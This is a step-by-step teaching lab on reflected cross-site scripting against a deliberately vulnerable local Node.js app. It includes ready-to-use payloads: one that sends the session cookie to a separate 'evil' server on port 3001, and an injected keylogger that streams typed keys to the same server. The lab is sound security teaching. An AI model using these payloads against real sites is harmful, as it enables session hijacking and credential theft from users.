XSS vulnerabilities are generally used to steal sensitive information (login credentials, authentication tokens, personal user data) as well as perform actions on behalf of authenticated users.
Note: For Windows users, open Git Bash. You will use this program to run all the "terminal" commands you see in the rest of this guide.
For Linux and Mac users, open Terminal.
In your terminal program:
1) Use git to download the project:
> git clone https://github.com/Learn-by-doing/xss.git
If successful, a new folder named xss should have been created.
2) Change directory into the new folder:
> cd xss
3) Install the project's dependencies using npm:
> npm install
4) Now we can run the local web server using Node.js:
> node server.js
5) If successful, you should see the message "Server listening at localhost:3000". This means that a local web server is now running and is listening for requests at localhost:3000.
Proof of Concept
6) Open your browser and go to http://localhost:3000.
> You should see a simple search form. Enter some text then press enter (or click the "search" button).
7) Open the developer tools in your browser (F12) and open the "Console" sub-tab.
Copy/paste the following code into the console and run it:
encodeURIComponent('<img src="does-not-exist" onerror="alert(\'hi!\')">');
8) Copy the output and paste it into the address bar so that the URL looks like this:
http://localhost:3000/?q=%3Cimg%20src%3D%22does-not-exist%22%20onerror%3D%22alert('hi!')%22%3E
Exploitation
9) Open the "Application" sub-tab in your browser's developer tools. Under "Storage" -> "Cookies", click "localhost:3000" to show the cookies being saved by the browser for this website.
10) Notice how there is a cookie named "connect.sid". This is a session cookie set by our local webserver. Is it possible for us to access this via the XSS vulnerability? Let's try. Repeat the steps from the "Proof of Concept" section above, but with the following code:
<img src="does-not-exist" onerror="alert(document.cookie)">
11) Encode the above HTML exactly as in step 7 (paste it inside the single quotes of encodeURIComponent('...') in the console) and use the output as the q parameter.
If successful, you should see the contents of the session cookie printed in an alert pop-up.
12) Now before continuing, we will need to start our "evil" web server. Run the following command in a second terminal window:
> node evil-server.js
13) And now try to use the following code with the XSS vulnerability to steal the session cookie:
<img src="does-not-exist" onerror="var img = document.createElement(\'img\'); img.src = \'http://localhost:3001/cookie?data=\' + document.cookie; document.querySelector(\'body\').appendChild(img);">
14) Encode the above HTML as in step 7 and use the output as the q parameter. The \' sequences are there because the HTML is pasted inside a single-quoted JavaScript string; they become plain single quotes once encoded.
> Check the terminal window of the evil server. Do you see the contents of the session cookie?
15) Here is the JavaScript from step 13 in readable form:
// Create an image whose URL carries the cookie; the browser fetches it
// without any user interaction, which delivers the data to the :3001 server.
var img = document.createElement('img');
img.src = 'http://localhost:3001/cookie?data=' + document.cookie;
document.querySelector('body').appendChild(img);
16) Now let's get even more nasty. Let's try a key-logger:
<img src="does-not-exist" onerror="var timeout; var buffer = \'\'; document.querySelector(\'body\').addEventListener(\'keypress\', function(event) { if (event.which !== 0) { clearTimeout(timeout); buffer += String.fromCharCode(event.which); timeout = setTimeout(function() { var xhr = new XMLHttpRequest(); var uri = \'http://localhost:3001/keys?data=\' + encodeURIComponent(buffer); xhr.open(\'GET\', uri); xhr.send(); buffer = \'\'; }, 400); } });">
17) Encode the above HTML as in step 7 and use the output as the q parameter. Type into the page and check the evil server's terminal for the keystrokes.